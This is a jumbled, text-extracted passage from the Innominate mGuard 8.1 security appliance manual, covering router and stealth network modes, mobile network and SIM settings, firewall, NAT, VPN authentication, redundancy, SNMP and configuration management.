415. ted to the telephone network fixed line or GSM network The connection to the telephone network is established via the terminal strip on the bottom of the device for the mGuard industrial rs with built in modem or ISDN terminal adapter This enables a remote PC that is also connected to the telephone network via a modem or ISDN adapter to establish a PPP Point to Point Protocol dial up line connection to the mGuard Innominate Security Technologies 139 mGuard 8 1 This method is referred to as a PPP dial in option It can be used for access to the LAN which is located behind the mGuard or for configuration of the mGuard Dial in is the interface definition used for this connection type in firewall selection lists In order to access the LAN with a Windows computer using the dial up line connection a network connection must be set up on this computer in which the dial up line connec tion to the mGuard is defined In addition the IP address of the mGuard or its host name must be defined as the gateway for this connection so that the connections to the LAN can be routed via this address To access the web configuration interface of the mGuard you must enter the IP ad dress of the mGuard or its host name in the address line of the web browser The serial interface of the mGuard is connected to the serial interface of a PC On the PC the connection to the mGuard is established using a terminal program and the configuration is imple
416. ted in PPPoE mode NAT must be activated in order to gain access to the Internet If NAT is not activated it is possible that only VPN connections can be used For the further configuration of PPPoE network mode see Router network mode PP PoE router mode on page 127 Router Mode PPTP Similar to PPPoE mode For example in Austria the PPTP protocol is used instead of the PPPoE protocol for DSL connections PPTP is the protocol that was originally used by Microsoft for VPN connections If the mGuard is operated in PPTP mode the mGuard must be set as the default gateway on the locally connected computers This means that the IP address of the mGuard LAN port must be specified as the default gateway on these computers lf the mGuard is operated in PPTP mode NAT should be activated in order to gain access to the Internet from the local network see Network gt gt NAT on page 152 If NAT is not activated it is possible that only VPN connections can be used For the further configuration of PPTP network mode see Router network mode PPTP router mode on page 128 110 Innominate Security Technologies 105661_en_02 105661_en_02 Network menu Router Mode Modem Only for mGuard rs4000 rs2000 mGuard rs4000 rs2000 3G mGuard centerport mGuard industrial rs mGuard blade mGuard delta mGuard delta EAGLE mGuard If Modem network mode is selected the external Ethernet interface
417. ted on the mGuard rs4000 rs2000 3G AT amp T 3G US in the USA mobile network connection v ia AT amp T 105661_en_02 Network gt gt Mobile Network gt gt General Radio settings GSM Frequencies 3G UMTS Frequencies CDMA Frequencies Connection Supervision Daily relogin Daily relogin at 105661_en_02 Network menu Default World all frequencies GSM off Europe Asia 900 1800 MHz North America 850 1900 MHz Europe Asia 900 MHz Europe Asia 1800 MHz North America 850 MHz North America 1900 MHz Default World all frequencies UMTS off World 850 1900 2100 MHz North America 850 1900 MHz Europe Asia 2100 MHz Other countries 850 2100 MHz North America 850 MHz North America 1900 MHz World 800 MHz World 900 MHz Default CDMA 800 1900 MHz CDMA off CDMA 800 MHz CDMA 1900 MHz CDMA 800 1900 MHz The connection to the mobile network provider is renewed daily at a specified time Otherwise the mobile network oper ator regularly resets the connection from their side Default No Time at which the connection is renewed The entry Yes must be selected under Daily relogin for this to take effect For this to work correctly the time must be successfully syn chronized realtime clock NTP server GPS GLONASS Default 0h 0Om Values 0 23 hours and 0 59 minutes 17
418. tered values on a configuration page and these have not yet taken effect by clicking on the Apply button you can restore the original values on the page by clicking the Reset but ton Apply To apply the settings on the device you must click on the Apply button This applies across all pages Innominate Security Technologies 21 m Guard 8 1 Working with sortable tables Many settings are saved as data records Accordingly the adjustable parameters and their values are presented in the form of table rows If multiple firewall rules are defined these are queried starting from the top of the list of entries until an appropriate rule is found There fore note the order of the entries if necessary The order can be changed by moving table rows up or down With tables you can Insert rows to create a new data record with settings e g the firewall settings for a spe cific connection Move rows i e resort them Delete rows to delete the entire data record Inserting rows DX a gt lt HE C 8 SOR Ero FE 2 The new row is inserted You can now enter or specify values in the row Moving rows ae l X fo fo Fo FL F F ri ri FO 3 The rows are moved Deleting rows OXE o o x fo fo o 1 f F FOR Fo vi ria 0 1 Select the rows you want to delete 2 Clickon x to delete the rows 3 The rows are deleted 22 Innominate Security Technologies 105661_en_02 Configuration help
419. terface can also be configured see Sec ondary External Interface on page 116 For the further configuration of Stealth network mode see Network Mode Stealth on page 112 108 Innominate Security Technologies 105661_en_02 Network menu Router default setting mGuard rs4000 rs2000 3G mGuard centerport mGuard blade controller mGuard delta If the mGuard is in Router mode it acts as the gateway between various subnetworks and has both an external interface WAN port and an internal interface LAN port with at least one IP address WAN port The mGuard is connected to the Internet or other external parts of the LAN via its WAN port mGuard smart the WAN port is the Ethernet socket LAN port The mGuard is connected to a local network or a single computer via its LAN port m Quard smart the LAN port is the Ethernet connector mQGuard pci in driver mode the LAN port is represented by the network interface of the operating system that has the network card operating system in this example mGuard pci In Power over PCI mode the LAN port is the LAN socket of the mGuard pcie SD mGuard pci SD mGuard pci As in the other modes firewall and VPN security functions are available If the mGuard is operated in Router mode it must be set as the default gateway on the locally connected computers This means that the IP address of the mGuard LAN port must be specified as the default gatew
420. tes the relevant template Name Name of the template The name is specified when the tem plate is created Innominate Security Technologies 225 mGuard 8 1 Network Security gt gt User Firewall gt gt User Firewall Templates General The following tab page appears when you click on Edit General Template users Firewall rules Options aaah il gp kiitars BluePrint Enabled Yes Comment Timeout 26600 Timeout type static Seconds F YPN connection BluePrint Options A descriptive name for the template Enabled Comment Timeout 226 Innominate Security Technologies The user firewall template can be freely named and renamed Yes No When set to Yes the user firewall template becomes active as soon as firewall users log into the mGuard who are listed on the Template users tab page see below and who have been assigned this template It does not matter from which com puter and under what IP address the user logs in The assign ment of the firewall rules to a user is based on the authentica tion data that the user enters during login user name password Optional explanatory text Default 28800 Specifies the time in seconds at which point the firewall rules are deactivated If the user session lasts longer than the time out time specified here the user has to log in again 105661_en_02 Network Security menu Network Security gt gt User Firewall gt g
421. teway for explicit static routes for devices located in the same Ethernet segment as the external network interface of the mGuard The active mGuard can receive ICMP queries via this IP ad dress It reacts to these ICMP requests depending on the menu settings under Network Security gt gt Packet Filter gt gt Ad vanced No subnet masks or VLAN IDs are set up for the virtual IP ad dresses as these attributes are defined by the actual external IP address For each virtual IP address an actual IP address must be configured whose IP network accommodates the vir tual address The mGuard transmits the subnet mask and VLAN setting from the actual external IP address to the corre sponding virtual IP address The applied VLAN settings define whether standard MTU set tings or VLAN MTU settings are used for the virtual IP address Firewall redundancy cannot function correctly if no actual IP address and subnet mask are avail able 105661_en_02 Innominate Security Technologies 309 mGuard 8 1 Redundancy gt gt Firewall Redundancy gt gt Redundancy Internal virtual Router 1 2 3 255 default 51 2 Only in Router network mode This ID is sent by the redundant pair with each presence noti fication CARP via the external and internal interface and is used to identify the redundant pair This ID must be set so it is the same for both mGuard devices It is used to differentiate the redundant pair from other Ether net
422. tgoing connections If no rule is defined all outgoing connections are prohibited excluding VPN General firewall set Allow all outgoing connections the data packets of all out ting going connections are allowed Drop all outgoing connections the data packets of all out going connections are discarded Accept Ping only the data packets of all outgoing connec tions are discarded except for ping packets ICMP Use the firewall ruleset below displays further setting op tions This menu item is not included in the scope of functions for the mGuard rs2000 3G and mGuard rs2000 The following settings are only visible if Use the firewall ruleset below is set Protocol All means TCP UDP ICMP GRE and other IP protocols From IP To IP 0 0 0 0 0 means all IP addresses To specify an address area use CIDR format see CIDR Classless Inter Domain Rout ing on page 24 From Port To Port Only evaluated for TCP and UDP protocols any refers to any port startport endport e g 110 120 refers to a port area Individual ports can be specified using the port number or the corresponding service name e g 110 for pop3 or pops for 110 208 _Innominate Security Technologies 105661_en_02 Network Security menu Network Security gt gt Packet Filter gt gt Outgoing Rules Action Accept means that the data packets may pass through Reject means that the data packets are sent back and the sender is
423. the performance of the mGuard and VPN partners and the latency of the mGuard devices on the network If this is not feasible for redundancy the VPN partners of a redundant pair must be config ured so that they accept all certificates whose validity is confirmed by a set of specific CA certificates see CA Certificates on page 199 and Authentication on page 269 To do this select Signed by any trusted CA under Psec VPN gt gt Connections gt gt Edit gt gt Authentication Remote CA Certificate If the new machine certificate is issued from a different sub CA certificate the VPN partner must be able to recognize this before the redundant pair can use the new machine certifi cate The machine certificate must be replaced on both mGuard devices in a redundant pair However this is not always possible if one cannot be reached This might be the case in the event of a network failure for example The mGuard on standby may then have an obsolete machine certificate when it becomes active This is another reason for setting the VPN part ners so that they use both machine certificates The machine certificate is normally also replicated with the corresponding key during VPN state synchronization In the event of a fail over the other mGuard can take over and even continue establishing incomplete ISAKMP SAs Switching the remote certificates for a VPN connection The mGuard can be set to authenticate VPN partners directly us
424. thernet multicasts layer 2 Tables of systems connected to the network are created from the responses and these can be requested via SNMP Management gt gt SNMP gt gt LLDP LLDP Mode Internal LAN interface Chassis ID External WAN interface IP address Port description System name Button Update 90 Innominate Security Technologies Enabled Disabled The LLDP service or agent can be globally enabled or dis abled here If the function is enabled this is indicated by a green signal field on the tab at the top of the page If the signal field is red the function is disabled A unique ID of the computer found typically one of its MAC ad dresses IP address of the computer found This can be used to perform administrative activities on the computer via SNMP A textual description of the network interface where the com puter was found Host name of the computer found To update the displayed data if necessary click on Update 105661 _en_02 Management menu 4 6 Management gt gt Central Management 4 6 1 Configuration Pull Management Central Management Configuration Pull Configuration Pull Pull Schedule Never Sewer config example com Port 445 Directory Filename lf empty 1A715030 atw will be used Number of times a configuration profile is ignored 2 after it was rolled back Download timeout seconds 120 Login anonymous Password SPF oes The server s certifica
425. tion Enabled w State SIM tray inserted PIN of the SIM card Roaming Yes w Access Point Name APN of the Provider PPP authentication No w Secondary SIM slot Activation Enabled w SIM tray inserted Yes v No 0 hours 105661 _en_02 Network gt gt Mobile Network gt gt SIM Settings Current SIM Slot State Roaming Current Provider Primary SIM slot Activation State PIN of the SIM card Roaming Provider selection 105661_en_02 Network menu Indicates whether SIM 1 or SIM 2 is used Indicates the state of the SIM card SIM state unknown SIM inserted and authorized Invalid SIM SIM inserted No SIM found If roaming is enabled a mobile network device can also dial into another network Here the mobile network that the mGuard has dialed into is displayed Not registered the mGuard has not dialed into any mo bile network Registered to home network the mGuard has dialed into the mobile network provided Registered to foreign network the MGUARD has reg istered with a foreign mobile network Name of the mobile network provider in use You can prevent or enable the use of the SIM card SIM tray inserted without SIM card No SIM tray neither the SIM card nor tray are available Wrong PIN PIN required PUK required if the pin is incorrectly entered too often SIM error the SIM card could not be accessed SIM ready The SIM card can be p
426. tion for firewall state synchroniza tion As an ancillary effect the status indicator of the VPN connection can also be seen on the mGuard on standby You can therefore find the contents of the VPN state database repli cated under the normal status indicator for the VPN connection under IPsec VPN gt gt IPsec Status Only the state of the synchronization process is shown in the status indicator for firewall re dundancy Redundancy gt gt FW Redundancy Status gt gt Redundancy Status 16 2 2 Interaction of the VPN redundancy components The individual components interact in the same way as described for firewall redundancy VPN state synchronization is also controlled by state monitoring The state is recorded and updates are sent Certain conditions must be met for the states to occur VPN state synchronization is taken into account here 16 2 3 Error compensation through VPN redundancy VPN redundancy compensates for the exact same errors as firewall redundancy see Error compensation through firewall redundancy on page 337 However the VPN section can hinder the other VPN gateways in the event of a network lo botomy The independent mGuard devices then have the same virtual IP address for com municating with the VPN partners This can result in VPN connections being established and disconnected in quick succession 346 Innominate Security Technologies 105661_en_02 Redundancy 16 2 4 Setting the variables
427. tners A message encrypted with the public key can only be decrypted and read by the owner of the associated private key A message encrypted with the private key can be decrypted by any recipient in possession of the associated public key Encryption using the private key shows that the message actually originated from the owner of the associated public key Therefore the expression digital signature is also often used However asymmetrical encryption methods such as RSA are both slow and susceptible to certain types of attack As a result they are often combined with some form of symmetrical encryption Symmetrical encryption on page 364 On the other hand concepts are available enabling the complex additional administration of symmetrical keys to be avoided This symmetrical encryption algorithm Symmetrical encryption on page 364 was de veloped by IBM and checked by the NSA DES was specified in 1977 by the American Na tional Bureau of Standards the predecessor of the National Institute of Standards and Technology NIST as the standard for American governmental institutions As this was the very first standardized encryption algorithm it quickly won acceptance in industrial circles both inside and outside America DES uses a 56 bit key length which is no longer considered secure as the available pro cessing power of computers has greatly increased since 1977 3DES is a version of DES It uses keys that
428. troute via 10 0 0 253 Used DNS servers DNS Root Servers Internal modem Offline Network Mode Network Mode Router w Router Mode static v External Networks Sets T T 4 Say ws ye 10 0 0 152 255 255 255 0 No v TOTE emon Saa IP of default gateway 10 0 0 253 Network gt gt Interfaces gt gt General Router network mode static router mode External Networks External IPs The addresses via which the mGuard can be accessed by de untrusted port vices on the WAN port side If the transition to the Internet takes place here the external IP address of the mGuard is as signed by the Internet service provider ISP IP Netmask P address and subnet mask of the WAN port Use VLAN Yes No Ifthe IP address should be within a VLAN set this option to Yes VLAN ID AVLAN ID between 1 and 4095 An explanation can be found under VLAN on page 364 If you want to delete entries from the list please note that the first entry cannot be deleted Additional External In addition to the default route via the default gateway speci Routes fied below additional external routes can be specified Network Gateway See Network example diagram on page 25 Internal modem Displays the status of the internal modem mobile network modem of the mGuard rs4000 rs2000 3G and the internal an alog modem for the mGuard industrial rs 105661_en_02 Innominate Security Technologies 125 mGuard 8 1
429. ts partner thus allowing communication with B A has previously received a copy of the certificate from B e g by data carrier or e mail which B will use to identify itself to A Acan then verify that the certificate shown by B actually belongs to B by comparing it with this copy With regard to the mGuard interface the certificate copy given here by part ner B to A is an example of a remote certificate For reciprocal authentication to take place both partners must thus provide the other witha copy of their certificate in advance in order to identify themselves A installs the copy of the certificate from B as its remote certificate B then installs the copy of the certificate from A as its remote certificate Never provide the PKCS 12 file file name extension p12 as a copy of the certificate to the partner in order to use X 509 authentication for communication at a later time The PKCS 12 file also contains the private key that must be kept secret and must not be given to a third party see Creation of certificates on page 192 To create a copy of a machine certificate imported in the mGuard proceed as follows e On the Machine Certificates tab page click on Current Certificate File next to the Download Certificate row for the relevant machine certificate see Machine Certifi cates on page 197 The certificate shown by a partner can also be checked by the mGuard in a different way i e not by consulting the l
430. tus No default firewall redundancy is disabled Yes firewall redundancy is enabled This function can only be activated when a suitable license key is installed Further conditions apply if VPN redundancy is to be enabled at the same time see VPN redundancy on page 345 Maximum time that is allowed to elapse in the event of errors before switching to the other mGuard 0 10000 milliseconds default 0 Time the redundancy system ignores an error The connectivity and availability checks ignore an error until it is still present after the time set here has elapsed high low Specifies the priority associated with the presence notifica tions CARP Set the priority to high on the mGuard that you want to be ac tive The mGuard on standby is set to low Both mGuard devices in a redundant pair may either be set to different priorities or be assigned the high priority Never set both mGuard devices in a redundant pair to low priority 105661_en_02 Redundancy menu Redundancy gt gt Firewall Redundancy gt gt Redundancy Passphrase for avail On an mGuard which is part of a redundant pair checks are ability checks constantly performed to determine whether an active mGuard is available and whether it should remain active A variation of the CARP Common Address Redundancy Protocol is used here CARP uses SHA 1 HMAC encryption together with a pass word This password must be set so it is the same for bot
431. ty Technologies 91 mGuard 8 1 Management gt gt Central Management gt gt Configuration Pull Directory The directory folder on the server where the configuration is located Filename The name of the file in the directory defined above If no file name is defined here the serial number of the mGuard is used with file extension atv Number of times a Default 10 configuration profile is ignored after it was rolled back After retrieving a new configuration it is possible that the mGuard may no longer be accessible after applying the new configuration It is then no longer possible to implement a new remote configuration to make corrections In order to prevent this the mGuard performs the following check As soon as the retrieved configuration is applied the mGuard tries to connect to the con figuration server again based on the new configuration It then attempts to download the newly applied configuration profile again If successful the new configuration remains in effect If this check is unsuccessful for whatever reason the mGuard assumes that the newly ap plied configuration profile is faulty The mGuard remembers the MD5 total for identifica tion purposes The mGuard then performs a rollback Rollback means that the last working configuration is restored This assumes that the new non functioning configuration contains an instruction to perform a rollback if a newly loaded configuration profile
432. uard 8 1 IPsec VPN gt gt Connections gt gt Edit gt gt Authentication Authentication Authentication method Pre Shared Secret PSK IPsec VPN Connections BluePrint General Authentication Firewall IKE Options Authentication Authentication method 9 Pre Shared Secret PSK w Pena pekas complicated_like_SDy0qoD_and_long ISAKMP Mode Please note that Aggressive Mode is vulnerable to attacks Aggressive Mode insecure w VPN Identifier Local By default the IP address of the peer is used Other possible settings are a hostname hostname or an e mail address name hostname Remote By default the IP address of the peer is used Other possible settings are a hostname hostname or an e mail address name hostname This method is mainly supported by older IPsec implementations In this case both sides of the VPN authenticate themselves using the same PSK To make the agreed key available to the mGuard proceed as follows e Enter the agreed string in the Pre Shared Secret Key PSK entry field To achieve security comparable to that of 3DES the string should consist of around 30 randomly selected characters and should include upper and lower case characters and digits When PSK is used together with the Aggressive Mode insecure setting a fixed Diffie Hellman algorithm must be selected under IKE Options for the initiator of the connection When PSK is used togeth
433. ubscriber can be di aled Example ATDOW765432 T switch to tone dialing Insert the special dial character T before the phone num ber if the faster tone dialing procedure is to be used with tone compatible telephone connections Example ATDT765432 Authentication PAP CHAP None PAP Password Authentication Protocol CHAP Challenge Handshake Authentication Protocol These terms describe procedures for the secure transmission of authentication data using the Point to Point Protocol If the Internet service provider requires the user to login using a user name and password then PAP or CHAP is used as the authentication method The user name password and any other data that must be specified by the user to establish a connection to the Internet are given to the user by the Internet service provider The corresponding fields are displayed depending on whether PAP CHAP or None is selected Enter the corresponding data in these fields If authentication is via PAP Authentication PAP w User name Password PAP server authentication No w Dialondemand Yes w idle timeout Yes wv idle time Seconds 300 LocalIP 0 0 0 0 Remote IP 0 0 0 0 Netmask 0 0 0 0 User name User name specified during Internet service provider login to access the Internet Password Password specified during Internet service provider login to access the Internet 105661_en_02 Innominate Security Technologies 131 mGuard 8 1 Network gt gt I
434. uilt in ISDN terminal adapter of the mGuard This must be connected to the telephone network The connection to the Internet is then established via the telephone network After selecting Built in modem the fields for specifying the modem connection parameters are displayed For the further configuration of Built in modem modem network mode see Router net work mode Modem router mode on page 129 Router Mode Built in mobile network modem m Guard rs4000 rs2000 3G only If the Built in mobile network modem is selected data traffic is routed via the built in mobile network modem instead of the WAN port of the mGuard For the further configuration of Built in modem modem network mode see Router net work mode Modem router mode on page 129 Innominate Security Technologies 111 m Guard 8 1 Network Mode Stealth Default setting mGuard rs4000 rs2000 mGuard industrial rs mGuard smart mGuard smart mGuard pci SD mGuard pcie SD mGuard pci mGuard delta EAGLE mGuard Network Interfaces cent seme oat oa town con When Stealth is selected as the network mode and static is se lected for the Stealth configura 112 Innominate Security Technologies Network Status External IP address 172 16 66 49 Active Defaultroute 172 16 66 18 Used DNS servers 10 1 0 253 Network Mode Network Mode Stealth w Stealth configuration autodetect v Autodetect i
435. umber is only to be used in the following scenario an mGuard connected upstream of a machine must establish connections to two or more different maintenance centers and their mGuard devices with TCP encapsulation enabled UDP packets can be oversized if an IPSec connection is es tablished between the participating devices via IKE and certif icates are exchanged Some routers are not capable of for warding large UDP packets if they are fragmented over the transmission path e g via DSL in 1500 byte segments Some faulty devices forward the first fragment only resulting in connection failure If two mGuard devices communicate with each other it is pos sible to ensure at the outset that only small UDP packets are to be transmitted This prevents packets from being frag mented during transmission which can result in incorrect rout ing by some routers If you want to use this option set it to Yes If this option is set to Yes the setting only takes ef fect if the partner is an mGuard with installed firm ware Version 5 1 0 or later In all other cases the setting has no effect negative or otherwise 105661_en_02 IPsec VPN menu IPsec VPN gt gt Global gt gt Options IPsec MTU default is The option for avoiding oversized IKE data packets which 16260 cannot be routed correctly on the transmission path by faulty routers can also be applied for IPsec data packets In order to remain below the upper limit of
436. umdirectory integrity checksum Checksumdirectory is the directory and contains the files be ginning with integrity checksum CIFS Integrity Monitoring CIFS Integrity Checking C Checked Share Management Last Check Summary 2 Last check finished successfully Report The location of the report is 192 168 1 10 C integrity check log txt The signature has not been verified yet UNC notation of the imported share 192 166 1 10 C Start of the check Sonntag 13 April 2014 15 50 46 Duration of the last check Current check Status Currently no scan is performed Possible Actions Suto Re Build the integrity database Perform this if the checked share s content has been changed Please note This will erase an already existing integrity database intentionally Cancel the current operation Please note Unless appointed otherwise the next operation will be started at the time of the next regular check cme mre mt ey database Please note Unless appointed otherwise the integrity database will be re created at the time of the next regular check 105661 _en_02 Innominate Security Technologies 237 mGuard 8 1 CIFS Integrity Monitoring gt gt CIFS Integrity Checking gt gt Settings gt gt Edit gt gt Management Last check Current check Possible Actions Summary Report UNC notation of the imported share Start of the last check Durat
437. under Management gt SNMP IPsec VPN Lists all VPN events The format corresponds to standard Linux format There are special evaluation programs that present information from the logged data ina more easily readable format 326 Innominate Security Technologies 105661_en_02 Support menu 15 Support menu 15 1 Support gt gt Tools 15 1 1 Ping Check Ping Check Traceroute DNS Lookup IKE Ping Ping Check Hostname IP Address myServer Support gt gt Tools gt gt Ping Check Ping Check Aim to check whether a partner can be accessed via a network Procedure e Enter the IP address or host name of the partner in the Hostname IP Address field Then click on Ping A corresponding message is then displayed 15 1 2 Traceroute Ping Check Traceroute DNS Lookup IKE Ping Traceroute Hostname IP Address myServer Do not resolve IP addresses to hostnames Support gt gt Tools gt gt Traceroute Traceroute Aim to determine which intermediate points or routers are located on the connection path to a partner Procedure e Enter the host name or IP address of the partner whose route is to be determined in the Hostname IP Address field e Ifthe points on the route are to be output with IP addresses instead of host names if applicable activate the Do not resolve IP addresses to hostnames checkbox e Then click on Trace A corresponding message is then displayed 105661_en
438. up to 1000 active VPN channels Hardware acceleration for encryption in the VPN tunnel except for mGuard centerport Additional features Remote Logging Router firewall redundancy depending on the license Administration using SNMP v1 v3 and Innominate Device Manager mGuard device manager PKI support for HTTPS SSH remote access Can actas an NTP and DNS server via the LAN interface Compatible with MGUARD Secure Cloud Plug n Protect technology Tracking and time synchronization via GPS GLONASS positioning system Support In the event of problems with your mGuard please contact your dealer a Additional information on the device as well as on release notes and software updates can be found on the Internet at www innominate com 12 Innominate Security Technologies 105661_en_02 mGuard basics 1 2 Typical application scenarios This section describes various application scenarios for the mGuard Stealth mode Plug n Protect Network router DMZ Demilitarized Zone VPN gateway WLAN via VPN tunnel Resolving network conflicts Mobile phone router via integrated mobile phone modem 1 2 1 Stealth mode Plug n Protect In stealth mode the mGuard can be positioned between an individual computer and the rest of the network The settings e g for firewall and VPN can be made using a web browser under the URL https 1 1 1 1 No configuration modifi
439. urity Technologies Default empty field The local VPN identifier can be used to specify the name the mGuard uses to identify itself to the partner It must match the data in the machine certificate of the mGuard Valid values Empty i e no entry default The Subject entry previ ously Distinguished Name in the machine certificate is then used The Subject entry in the machine certificate One ofthe Subject Alternative Names if they are listed in the certificate If the certificate contains Subject Alterna tive Names these are specified under Valid values are These can include IP addresses host names with prefix or e mail addresses Specifies what must be entered as a subject in the machine certificate of the VPN partner for the mGuard to accept this VPN partner as a communication partner It is then possible to limit or enable access by VPN partners which the mGuard would accept in principle based on certifi cate checks as follows Limited access to certain subjects i e machines and or to subjects that have certain attributes or Access enabled for all subjects See Subject certificate on page 360 Distinguished Name was previously used in stead of Subject 105661_en_02 IPsec VPN menu IPsec VPN gt gt Connections gt gt Edit gt gt Authentication 105661_en_02 Access enabled for all subjects lf the Remote field is lef
440. ute or differentiated routing settings e g PLCs without the corresponding settings The corresponding settings must be made under 1 1 NAT This method is also referred to as P masquerading Default settings NAT is not active If the mGuard is operated in PPPoE PPTP mode NAT must be activated in order to gain access to the Internet If NAT is not activated only VPN con nections can be used If multiple static IP addresses are used for the WAN port the first IP address in the list is always used for IP masquerading These rules do not apply in Stealth mode me e ae Outgoing on Interface External External 2 Any External Internal Specifies via which interface the data packets are sent so that the rule applies to them Any External refers to the External and External 2 interfaces 152 Innominate Security Technologies 105661_en_02 Network menu Network gt gt NAT gt gt Masquerading 1 1 NAT 105661_en_02 Example Masquerading is defined which applies for network data flows in Router mode These data flows are initiated so that they lead to a destination device which can be accessed over the selected network interface on the mGuard To do this the mGuard replaces the IP address of the initiator with a suitable IP address of the selected network interface in all associated data packets The effect is the same as for the other values of the same variables The IP address of the initi ator is hid
441. utomatically saved to the ECS i e the ECS always stores the profile cur rently used The mGuard only uses the automatically stored configuration profiles upon startup if the original password root is still set on the mGuard for the root user see Loading a profile from an external storage medium on page 78 Configuration changes are also made if the ECS is discon nected full or defective The corresponding error messages are displayed in the Logging menu see Logging gt gt Browse local logs Activation of the new setting extends the response time of the user interface when changing any settings 105661_en_02 Management gt gt Configuration Profiles Encrypt the data on the ECS Load configuration from ECS during boot 105661_en_02 Management menu Only for mGuard rs4000 rs2000 3G mGuard rs4000 rs2000 mGuard pci SD mGuard pcie SD mGuard delta m Guard centerport In the case of firmware 7 6 1 or later the configuration storage ECS and configuration profile ATV can be encrypted This makes the mGuard rollout easier You can save several mGuard configurations on an SD card on a USB stick in the case of mGuard centerport and then use it to startup all mGuards During the startup process the mGuard finds the valid configurations on the configuration storage This is loaded decrypted and used as a valid configuration If Yes is selected the configuration changes are e
442. vate traps Yes No enterprise oid mGuardinfo generic trap linkUp linkDown specific trap 0 Sent when the connection to a port is interrupted linkDown or restored linkUp Activate traps Yes No enterprise oid mGuardlnfo generic trap coldStart specific trap 0 Sent after a cold restart or warm start Activate traps Yes No enterprise oid mGuard generic trap enterpriseSpecific specific trap mGuardHT TPSLogintTrap 1 additional mGuardHT TPSLastAccessIP This trap is sent if Someone has tried successfully or unsuc cessfully e g using an incorrect password to open an HTTPS session The trap contains the IP address from which the attempt was issued enterprise oid mGuard generic trap enterpriseSpecific specific trap mGuardShellLoginTrap 2 additional mGuardShellLastAccessIP This trap is sent when someone opens the shell via SSH or the serial interface The trap contains the IP address of the login request If this request was sent via the serial interface the value is 0 0 0 0 105661_en_02 Management gt gt SNMP gt gt Trap Hardware related traps Chassis power sig only nal relay m Guard rs4000 rs2000 3G m Guard rs4000 rs2000 mGuard industrial rs EAGLE mGuard 105661_en_02 Management menu enterprise oid mGuard generic trap enterpriseSpecific specific trap TE mGuardDHCPLastAcces
443. ve registered with one of the DynDNS services supported by mGuard you can enter the corresponding information in this dialog box When using the mGuard rs4000 rs2000 3G be aware that DynDNS is not permitted by all mobile network providers Register this mGuard at a DynDNS Service Refresh Interval sec DynDNS Provider DynDNS Server Innominate Security Technologies Select Yes if you have registered with a DynDNS provider and if the mGuard is to use this service The mGuard then reports its current IP address to the DynDNS service i e the one as signed for its Internet connection by the Internet service pro vider Default 420 seconds The mGuard informs the DynDNS service of its new IP address whenever the IP address of its In ternet connection is changed In addition the device can also report its IP address at the interval specified here This setting has no effect for some DynDNS providers such as DynDNS org as too many updates can cause the account to be closed The providers in this list support the same protocol as the mGuard Select the name of the provider with whom you are registered e g DynDNS org TinyDynDNS DNS4BIZ If your provider is not in the list select DynDNS compatible and enter the server and port for this provider Only visible when DynDNS Provider is set to DynDNS com patible Name of the server for the DynDNS provider 105661_en_02 Network menu Network gt gt DNS gt
444. vent unauthor ized access The HTTPS server should only grant access to the config uration of this individual mGuard using the login and pass word specified Otherwise users of other mGuard devices could access this individual device The IP address or the host name specified under Server must be the same as the server certificate s common name CN Self signed certificates should not use the key usage extension To install a certificate proceed as follows Requirement the certificate file must be saved on the con nected computer e Click on Browse to select the file e Click on Import e By clicking on Test Download you can test whether the specified parameters are correct without actually saving the modified parameters or activating the configuration profile The result of the test is displayed in the right hand column Ensure that the profile on the server does not con tain unwanted variables starting with GAI_PULL_ as these overwrite the applied con figuration 105661_en_02 a Input CMD 1 CMD 2 CMD 3 Signal contact signal out put ACK 1 2 Alarm output ACK 3 105661_en_02 Management menu 4 7 Management gt gt Service I O This menu is only available on the mGuard rs4000 rs2000 3G mGuard rs4000 rs2000 mGuard industrial rs Service contacts service I Os can be connected to some mGuards mGuard rs4000 rs2000 3G mGuard rs4000 rs2000 mGuard indu
445. vent your own access being blocked you may have to permit access simultaneously via another interface explicitly with Accept be fore clicking on the Apply button to activate the new setting Otherwise if your access is blocked you must carry out the recovery proce dure 44 Innominate Security Technologies 105661_en_02 Management menu Management gt gt System Settings gt gt Shell Access Action Options Accept means that the data packets may pass through Reject means that the data packets are sent back and the sender is informed of their rejection In Stea th mode Re ject has the same effect as Drop Drop means that the data packets are not permitted to pass through They are discarded which means that the sender is not informed of their whereabouts Comment Freely selectable comment for this rule Log For each individual firewall rule you can specify whether the use of the rule Should be logged set Log to Yes Should not be logged set Log to No default setting 105661_en_02 Innominate Security Technologies 45 mGuard 8 1 Management gt gt System Settings gt gt Shell Access RADIUS Authentication Use RADIUS authenti This menu item is not included cation for Shell access in the scope of functions for the mGuard rs2000 3G mGuard rs2000 46 Innominate Security Technologies If set to No the passwords of users who log in via shell access are checked via the
446. waeiting SNMP LLDP 7 Network Security 7 CIFS Av Scan Connector 7 IPsec VPN V amaina The corresponding checkboxes for filtering entries according to their category are displayed below the log entries depending on which mGuard functions were active To display one or more categories enable the checkboxes for the desired categories and click on Reload logs 105661_en_02 Innominate Security Technologies 323 mGuard 8 1 14 2 1 Log entry categories Common Log entries that cannot be assigned to other categories Network Security In the case of the mGuard rs2000 and mGuard rs2000 3G access via its firewall is not logged Logged events are shown here if the logging of events was selected when defining the fire wall rules Log Yes Log ID and number for tracing errors Log entries that relate to the firewall rules listed below have a log ID and number This log ID and number can be used to trace the firewall rule to which the corresponding log entry relates and that led to the corresponding event Firewall rules and their log ID Packet filters Network Security gt gt Packet Filter gt gt Incoming Rules menu Network Security gt gt Packet Filter gt gt Outgoing Rules menu Log ID fw incoming or fw outgoing Firewall rules for VPN connections IPsec VPN gt gt Connections gt gt Edit gt gt Firewall menu Incoming Outgoing Log ID vpon fw in or vpn fw out
447. whether the use of the rule Should be logged set Log to Yes Should not be logged set Log to No default setting 228 Innominate Security Technologies 105661_en_02 CIFS Integrity Monitoring menu 9 CIFS Integrity Monitoring menu a CIFS integrity monitoring is not available on the mGuard rs2000 3G It must not be used on the mGuard blade controller In Stealth network mode CIFS integrity checking is not possible without a management IP address and the CIFS server for the anti virus scan is not supported There are two options for checking network drives for viruses using CIFS integrity monitor ing CIFS Integrity Checking CIFS Antivirus Scan Connector CIFS Integrity Checking When CIFS integrity checking is performed the Windows network drives are checked to determine whether certain files e g exe dll have been changed Changes to these files indicate a possible virus or unauthorized intervention CIFS Antivirus Scan Con The CIFS Antivirus Scan Connector enables the mGuard to perform a virus scan on nector drives that are otherwise not externally accessible e g production cells The mGuard mir rors a drive externally in order to perform the virus scan Additional anti virus software is re quired for this procedure Set the necessary read access for your anti virus software Setting options for CIFS integrity checking Which network drives are known to the mGuard see CIFS Integrity Mo
